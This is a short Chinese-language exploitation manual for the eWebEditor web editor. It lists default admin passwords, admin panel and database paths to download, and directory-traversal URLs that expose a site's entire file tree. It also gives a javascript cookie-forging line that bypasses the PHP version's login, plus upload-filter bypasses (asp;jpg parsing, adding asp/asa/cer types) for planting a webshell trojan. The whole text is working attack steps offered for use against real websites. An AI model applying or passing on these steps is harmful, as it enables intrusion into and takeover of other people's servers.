帐号密码:admin admin
样式设计:ewebeditor/admin_style.asp
查看版本:ewebeditor/dialog/about.html
数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..
跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..
点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)
( ewebeditor5.5版本 )
默认后台:ewebeditor/admin/login.asp
帐号密码:admin 198625
数据库路径:data/%23sze7xiaohu.mdb
遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../
调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )
默认后台:eWebEditor/admin/login.php
首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));
接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。
( ewebeditor编辑器exp手册 )
有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试
一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg
二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。
页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。